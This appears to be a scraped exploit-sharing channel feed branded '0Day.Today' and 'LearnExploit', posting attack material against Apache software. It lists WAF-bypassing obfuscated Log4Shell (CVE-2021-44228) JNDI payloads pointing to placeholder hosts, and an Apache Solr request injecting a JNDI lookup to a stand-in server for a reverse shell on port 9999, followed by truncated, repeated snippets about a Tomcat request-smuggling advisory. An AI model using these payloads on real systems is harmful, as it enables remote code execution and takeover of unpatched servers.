0Day.Today | Learn Exploit | Zero World | Dark web |
Apache Log4j 2.14.1 RCE (CVE-2021-44228) Bypass WAF : 1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} 2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} 3- ${jndi:rmi://adsasd.asdasd.asdasd} 4 - ${${lower:jndi}:${lowe…
CVE-2021-44228
#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
apache solr exploitمنبع :
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json
Security Analysis
#log4j #apache
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-46589 Apache Tomcat - Request Smuggling
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
#CVE #Apache
——————
0Day.Today
@LearnExploit
@Tech_Army
HackerOne
Internet Bug Bounty disclosed on HackerOne: Possibility of Request...
CVE-2023-46589 Apache Tomcat - Request Smuggling
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
Severity: Important
Description:
Tomcat did not correctly parse HTTP trailer headers. A specially crafted
trailer header that exceeded the header...
👍4⚡1